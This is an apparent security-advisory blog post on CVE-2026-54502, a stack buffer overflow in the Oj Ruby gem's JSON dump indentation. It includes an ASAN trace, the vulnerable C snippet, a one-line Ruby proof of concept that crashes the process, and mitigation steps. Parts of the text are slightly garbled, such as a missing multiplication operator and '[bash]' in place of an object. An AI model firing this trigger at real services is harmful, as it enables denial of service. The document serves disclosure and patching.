Listen to this Post
Oj is a widely-used Ruby gem designed for fast JSON parsing and object marshalling. CVE-2026-54502 describes a stack-based buffer overflow vulnerability in the `Oj.dump` method when an excessively large `:indent` value is provided.
The vulnerability resides in the `fill_indent` function within ext/oj/dump.h. This function is responsible for adding indentation whitespace when serializing Ruby objects to JSON. The `fill_indent` function calculates the number of spaces needed using the expression (size_t)(out->opts->indent depth), where `opts->indent` is the user-provided indentation value and `depth` is the nesting depth of the object being dumped.
The critical flaw is that the `indent` option is accepted as a plain Ruby integer and stored as an `int` without any range validation. When `opts->indent` is set to `INT_MAX` (2,147,483,647), the `(size_t)` cast preserves this large value. The subsequent `memset(out->buf + …, ‘ ‘, len)` call then attempts to write approximately 2 GB of space characters into the stack-allocated `out` buffer, which is only 4,184 bytes in size. This massive write corrupts the stack and crashes the process.
The issue is triggered when calling `Oj.dump` with `mode: :compat` and an extreme `indent` value. The AddressSanitizer (ASAN) report confirms a stack-buffer-overflow at the `memset` call in fill_indent, with the overflow occurring at offset 4728 from the `out` buffer’s base address. The call stack traces the overflow through dump_array, oj_dump_obj_to_json_using_params, and ultimately dump.
All versions of the oj gem containing `ext/oj/dump.h` are affected, with version 3.17.1 confirmed as vulnerable. The vulnerability was discovered and reported through fuzzing efforts, and the project has since been added to Google’s OSS-Fuzz infrastructure for continuous security testing.
DailyCVE Form
Platform: …… Ruby (oj gem)
Version: …….. all versions with dump.h (3.17.1 confirmed)
Vulnerability : stack-based buffer overflow
Severity: ……. High
date: ………. 2026-06-05
Prediction: ….. 2026-06-19
What Undercode Say: Analytics
Check installed oj gem version gem list oj Verify vulnerability by attempting to dump with extreme indent ruby -e "require 'oj'; Oj.dump([bash], mode: :compat, indent: 2147483647)"
ASAN Report (from CVE advisory):
==69820==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7fd1fc201278 WRITE of size 2147483647 at 0x7fd1fc201278 thread T0 0 memset 1 fill_indent /ext/oj/dump.h:77 2 dump_array /ext/oj/dump_compat.c:165 3 oj_dump_obj_to_json_using_params /ext/oj/dump.c:818 4 dump_body /ext/oj/oj.c:1429 5 dump /ext/oj/oj.c:1480 Address is in stack of thread T0 at offset 4728 in frame: 0 dump /ext/oj/oj.c:1453 [544, 4728) 'out' <== Memory access at offset 4728 overflows this variable
Vulnerable Code (ext/oj/dump.h, line 77):
static void fill_indent(Out out, int depth) {
if (0 < out->opts->indent) {
size_t len = (size_t)(out->opts->indent depth);
// ...
memset(out->buf + ..., ' ', len); // len = 2147483647 depth
}
}
How Exploit
To exploit this vulnerability, an attacker must be able to control the `:indent` parameter passed to Oj.dump. The exploit is trivial to reproduce:
require "oj" obj = [bash] Oj.dump(obj, mode: :compat, indent: 2_147_483_647)
When executed, the `memset` call attempts to write 2 GB of data into a 4,184-byte stack buffer. This causes immediate stack corruption and process crash (segmentation fault). While the current impact is denial of service, the nature of stack-based buffer overflows means that under specific conditions, an attacker could potentially overwrite return addresses or other critical stack data to achieve arbitrary code execution.
The vulnerability is particularly concerning in applications that accept user-controlled indentation settings for JSON serialization, as any user who can influence the `indent` parameter can trigger the crash.
Protection
For Developers:
- Do not use extreme indent values when calling
Oj.dump. The `indent` parameter should be limited to reasonable values (e.g., 0-8 spaces). - Do not expose the `indent` option to end users without validating and capping the input. Applications should never allow untrusted users to control the indentation size.
- Validate and sanitize any user-provided integer that will be passed as the `indent` parameter.
- Upgrade to a patched version once the oj gem maintainers release a fix addressing this vulnerability.
For Maintainers (oj gem):
- Implement range validation on the `indent` option before storing it as an
int. - Cap the maximum allowed `indent` value to a safe limit (e.g., 255).
- Add fuzz testing for all dump-related code paths to catch similar issues early.
Impact
Denial of Service: The primary and immediate impact is application crash due to stack corruption. Any Ruby application using `Oj.dump` with a large `:indent` value will terminate unexpectedly.
Potential Arbitrary Code Execution: Stack-based buffer overflows can, in some cases, be leveraged to overwrite return addresses or function pointers on the stack, potentially allowing an attacker to execute arbitrary code. While this specific vulnerability has not been demonstrated to be exploitable for code execution, the underlying mechanism creates that risk.
Affected Systems: All applications using the oj gem with versions that include the vulnerable `ext/oj/dump.h` file are affected. The latest tested vulnerable version is 3.17.1.
CVSS Severity: High
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
